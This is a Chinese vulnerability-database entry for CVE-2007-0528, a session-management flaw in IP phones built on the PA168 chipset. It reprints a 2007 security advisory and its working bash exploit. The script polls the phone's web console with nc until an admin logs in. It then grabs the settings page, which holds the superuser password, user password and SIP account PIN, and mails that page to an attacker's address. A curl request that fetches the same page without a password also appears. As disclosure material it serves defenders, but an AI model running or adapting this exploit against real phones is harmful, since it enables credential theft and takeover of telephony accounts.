Centrality Communications(又称Aredfox)PA168 chipset和firmware 会话管理和敏感信息泄露漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112072 漏洞类型 未知
发布时间 2007-01-24 更新时间 2007-01-25
CVE编号 CVE-2007-0528 CNNVD-ID CNNVD-200701-446
漏洞平台 Hardware CVSS评分 9.0
|漏洞来源
https://www.exploit-db.com/exploits/3189
https://www.securityfocus.com/bid/86736
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-446
|漏洞详情
当由不同的IP电话提供时,CentralityCommunications(又称Aredfox)PA168chipset和firmware1.54及之前版本执行的adminweb控制台在使用HTTP时,没有要求身份认证标识或密码标识,这使得远程攻击者可以连接到现有的超级用户会话和获得敏感信息(密码和配置数据)。
|漏洞EXP
#!/bin/bash
# PR06-14: IP Phones based on Centrality Communications/Aredfox PA168 chipset weak session management vulnerability

# Author: Adrian Pastor [adrian.pastor-AT-procheckup.com] from ProCheckUp

# This advisory has been published following consultation with UK NISCC [http://www.niscc.gov.uk/]
# Date Found: 3rd November 2006
# Date Public: 22nd January 2007
# Vulnerable:
# Phones confirmed to be vulnerable:
# - ATCOM AT-320ED IP Phone running SIP firmware version V1.42 and 1.54
# - SOYO G668 Ethernet IP Phone running SIP firmware version v1.42
# The following vendors/models also use the same PA168 chipset/firmware
# and are therefore most likely to be vulnerable to the same issue:
# - AriaVoice
# - AT-323 from ATcom
# - JR168_100B from IPLink
# - JR168_100W from IPLink
# - JR168_200 from IPLink
# - Netweb-401/402 from NetWebGroup
# - OB-WAN VoIP: Ethernet#1 and Ethernet#2 phones are PA168-based
# - Vida some phones PA168 based
# - Wuchuan HOP-1001/1002/1003
# - Giptel IP phones G100, also Siptronic ST-100 and Siptronic ST-150 (PA168S chipset)
# - GNET some phones PA168x based
# - KE1020 Netphone (Meritline)
# - ML210 Meritline
# - Integrated Networks IN-1002. Found on eBay.
# - ArtDio IPF-2000 and IPF-2002L phones
# - Perfectone IP300

# Severity: Medium

# CVE Candidate: Not assigned

# Overview:
# There is a problem with the way IP Phones using the PA168 chipset handle
# authenticated sessions, allowing remote attackers to gain access to the
# admin web console running as superuser.

# Description:
# When the superuser account authenticates to the admin web console, a
# request such as the following is sent to the IP phone's web server:

# POST /a HTTP/1.1
# Referer: http://192.168.1.100/
# Host: 192.168.1.100
# Content-Length: 31

# auth=12345678&login=+++Login+++

# At this point, the superuser session is considered *active* by the web
# server. All it takes for attackers to perform an administrative task at
# this point, is for them to send a well-formed request to the web server.
# Since no authentication tokens or password are submitted within the HTTP
# requests, anyone can perform administrative tasks while the session is
# active. Even if the attacker sends the administrative requests from an
# IP address different to the one used by the superuser account, the IP
# Phone's web server would accept them as long as the superuser's session
# is still active.

# A script called "active-session-attack.sh" has been created, which
# remotely checks repeatedly until a superuser account has logged on by
# sending a forged superuser request every five seconds. As soon as the
# superuser session becomes active, the following information will be
# obtained from the settings page, and emailed to the attacker:

# - IP phone's superuser password - grants administrative access
# - IP phone's user password - grants restricted access
# - SIP gateway hostname/IP address
# - SIP account username
# - SIP account PIN number

# REQUEST:

# POST /g HTTP/1.1
# Host: 192.168.1.100
# Content-Length: 13

# back=++Back++

# RESPONSE (output has been partially omitted for clarification):

# HTTP/1.1 200 OK
# Content-Length: 16727
# Content-Type: text/html
# Connection: close

# <TITLE>IP Phone V1.54</TITLE>
# [output omitted]
# <INPUT name=sipproxy value="sip.test.com">
# <INPUT name=domain value="sip.test.com">
# <INPUT name=account value="myaccount" size=24 maxlength=32>
# <INPUT name=pin type=password value="1234">
# <INPUT name=superpassword type=password value="12345678">
# <INPUT name=password type=password value="1234">
# [output omitted]

# In order to test this vulnerability, the following steps have been provided:

# 1. Log into http://192.168.1.100 from computer A using the superuser
# password ('12345678' by default)
# 2. Send the following curl command from computer B:
# curl -d "back=++Back++" http://192.168.1.100/g
# 3. The administrative settings page should be returned without any
# password required.
# Note: the IP phone's web server is enabled by default
# Fix:

# Use access control lists on routers or firewalls in order to only allow
# trusted IP addresses to access ATCOM AT-320ED IP Phone's web server.
# Exposing the PA168-based IP Phone's admin web server on the Internet is
# not recommended.

# References:
# http://www.voip-info.org/wiki/view/PA168
# http://www.centralitycomm.com/
# http://www.aredfox.com/eindex.htm
# http://www.atcom.cn/En_products_At320ED.html
# http://www.soyogroup.com/products/proddesc.php?id=307
# http://www.procheckup.com/Vulner_2007.php

host="192.168.1.100";
attackers_email="adrian.pastor-AT-procheckup.com"
req="POST /g HTTP/1.0\r\nContent-length: 13\r\n\r\nback=++Back++\r\n\r\n";

while true
do
        res=`echo -en $req | nc -nv $host 80`;
        if echo $res | grep superpassword # if this gets returned, then we got the settings page with all SIP account and IP phone creds
        then
                echo "GOT IT!"
                echo $res > "admin-settings-page"
                echo $res | mail $attackers_email -s "PA168 IP Phone admin's settings page"
                exit 1
        else
                echo "bad luck"
        fi
        sleep 5
done

# milw0rm.com [2007-01-24]
|受影响的产品
Centrality Communications Pa168 Chipset Firmware 1.54
|参考资料

来源:BUGTRAQ
名称:20070123PR06-14:IPPhonesbasedonCentralityCommunications/AredfoxPA168chipsetweaksessionmanagementvulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/457868/100/0/threaded
来源:MISC
链接:http://www.procheckup.com/Vulner_PR0614.php
来源:OSVDB
名称:32966
链接:http://osvdb.org/32966
来源:VUPEN
名称:ADV-2007-0346
链接:http://www.frsirt.com/english/advisories/2007/0346
来源:SECUNIA
名称:23936
链接:http://secunia.com/advisories/23936
来源:SECUNIA
名称:23919
链接:http://secunia.com/advisories/23919
来源:MILW0RM
名称:3189
链接:http://milw0rm.com/exploits/3189